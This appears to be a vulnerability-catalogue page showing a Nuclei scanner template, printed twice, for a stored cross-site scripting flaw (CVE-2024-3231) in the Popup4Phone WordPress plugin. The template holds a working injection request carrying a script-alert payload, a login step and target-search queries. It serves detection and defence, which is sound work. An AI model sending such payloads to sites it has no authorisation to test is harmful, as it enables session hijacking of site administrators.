Popup4Phone <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

CVE-2024-3231

Verified

Description

Popup4Phone WordPress plugin through 1.3.2 contains a reflected cross-site scripting caused by unsanitized parameters, letting unauthenticated users execute scripts in admin browsers, exploit requires sending crafted requests.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Published Date

February 8, 2026

Template Author

shivam kamboj

CVE-2024-3231.yaml

id: CVE-2024-3231

info:
  name: Popup4Phone <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    Popup4Phone WordPress plugin through 1.3.2 contains a reflected cross-site scripting caused by unsanitized parameters, letting unauthenticated users execute scripts in admin browsers, exploit requires sending crafted requests.
  impact: |
    Attackers can execute scripts in admin browsers, potentially leading to session hijacking or defacement.
  remediation: |
    Update to the latest version of Popup4Phone plugin.
  reference:
    - https://wpscan.com/vulnerability/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3231
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-3231
    cwe-id: CWE-79
    epss-score: 0.0479
    epss-percentile: 0.8959
    cpe: cpe:2.3:a:ivanweb:popup4phone:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.component:"WordPress"
    fofa-query: body="popup4phone"
  tags: cve,cve2024,wordpress,wpscan,wp-plugin,popup4phone,xss,stored

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40test.com&popup4phone%5Bmessage%5D=test&ajax=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=popup4phone HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 4b0a00483046022100c14b5051b58a4136c69c484e611457aad9df11716eb5e2fed3ecfdb2566e390a022100e89d06ecfd74c510bfd194918d4c47ad3028666942d2790704cbf3eaae1bf994:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-3231

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93/https://nvd.nist.gov/vuln/detail/CVE-2024-3231

Remediation Steps

Update to the latest version of Popup4Phone plugin.

id: CVE-2024-3231

info:
  name: Popup4Phone <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    Popup4Phone WordPress plugin through 1.3.2 contains a reflected cross-site scripting caused by unsanitized parameters, letting unauthenticated users execute scripts in admin browsers, exploit requires sending crafted requests.
  impact: |
    Attackers can execute scripts in admin browsers, potentially leading to session hijacking or defacement.
  remediation: |
    Update to the latest version of Popup4Phone plugin.
  reference:
    - https://wpscan.com/vulnerability/81dbb5c0-ccdd-4af1-b2f2-71cb1b37fe93/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3231
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-3231
    cwe-id: CWE-79
    epss-score: 0.0479
    epss-percentile: 0.8959
    cpe: cpe:2.3:a:ivanweb:popup4phone:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.component:"WordPress"
    fofa-query: body="popup4phone"
  tags: cve,cve2024,wordpress,wpscan,wp-plugin,popup4phone,xss,stored

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40test.com&popup4phone%5Bmessage%5D=test&ajax=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=popup4phone HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 4b0a00483046022100c14b5051b58a4136c69c484e611457aad9df11716eb5e2fed3ecfdb2566e390a022100e89d06ecfd74c510bfd194918d4c47ad3028666942d2790704cbf3eaae1bf994:922c64590222798bb761d5b6d8e72950

Popup4Phone <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Popup4Phone <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps